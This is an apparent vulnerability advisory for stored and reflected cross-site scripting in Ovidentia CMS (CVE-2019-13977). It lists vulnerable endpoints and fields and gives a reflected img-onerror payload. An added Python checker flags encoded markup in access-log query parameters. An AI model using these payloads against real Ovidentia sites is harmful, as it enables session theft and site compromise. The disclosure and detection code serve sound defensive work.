#-------------------------------------------------------
# Exploit Title: Ovidentia CMS - XSS Ovidentia 8.4.3
# The vulnerability permits any kind of XSS attack: reflected, DOM and stored.
# Date: 06/05/2019
# [ CVE-2019-13977 ]
# Exploit Author:
# Fernando Pinheiro (n3k00n3)
# Victor Flores (UserX)
# Vendor Homepage: https://www.ovidentia.org/
# Version: 8.4.3 <= 8.6.4
# Tested on: Mac, Linux - Firefox, Safari
# Download http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
#
# [ Kitsun3Sec Research Group ]
#--------------------------------------------------------
POC
>========================================================
Stored XSS
>========================================================
1. POST http://TARGET/ovidentia/index.php?tg=groups
   Field:
     nom
2. POST http://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
   Fields:
     Nom
     Description
3. GET http://TARGET/ovidentia/index.php?tg=delegat
   Show groups
4. POST http://TARGET/ovidentia/index.php?tg=site&idx=create
   http://TARGET/ovidentia/index.php?tg=site&item=4
   Fields:
     Nom
     address
     description
5. POST http://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1
   Fields:
     Libellé du champ
   Explosion:
     http://TARGET/ovidentia/index.php?tg=forums&idx=notices
     http://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1
     http://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1
6. POST http://TARGET/ovidentia/index.php?tg=notes&idx=Create
   Fields: Notes
   Explosion:
     http://TARGET/ovidentia/index.php?tg=notes&idx=List
7. POST http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add
   Fields: all
   Explosion:
     http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2
>========================================================
REFLECTED
>========================================================
1. GET http://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
---
[CHANGELOG]
4th of August of 2019 - Ovidentia 8.6.4 was tested and failed to prevent the attack; it is therefore still vulnerable.
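
The reflected request above carries its markup percent-encoded in the item query parameter, so it shows up in web server access logs. The following is an added example, not part of the original advisory: a Python check that flags Ovidentia index.php requests whose query values decode to HTML markup. The log lines are constructed samples; the function names and the combined log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Markup that lets a value leave an HTML attribute, open a tag, or add an event handler.
MARKUP = re.compile(r'[<>"]|\bon\w+\s*=', re.I)
# Request line as it appears in a combined-format access log (assumed format).
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return [(tg, param, decoded_value)] for index.php query values carrying markup."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/index.php"):
        return []
    params = parse_qsl(url.query, keep_blank_values=True)  # decodes one layer
    tg = dict(params).get("tg", "")  # Ovidentia module selector, as in the URLs above
    hits = []
    for name, value in params:
        value = decode_fully(value)
        if MARKUP.search(value):
            hits.append((tg, name, value))
    return hits

# Constructed sample log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Aug/2019:10:00:00 +0000] "GET /ovidentia/index.php?tg=admoc'
    '&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 512',
    '203.0.113.6 - - [04/Aug/2019:10:00:01 +0000] "GET /ovidentia/index.php?tg=notes'
    '&idx=List HTTP/1.1" 200 900',
    '203.0.113.6 - - [04/Aug/2019:10:00:02 +0000] "GET /index.php?tg=fileman&gr=Y'
    '&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip HTTP/1.1" 200 4096',
    '203.0.113.7 - - [04/Aug/2019:10:00:03 +0000] "GET /ovidentia/index.php?tg=admoc'
    '&idx=addoc&item=%2522%253E%253Cimg%2520src=x%253E HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for hit in suspicious_params(line):
            print("markup in query parameter:", hit)
```

The stored variants are submitted in POST bodies, which standard access logs do not record, so this check covers only the reflected GET case.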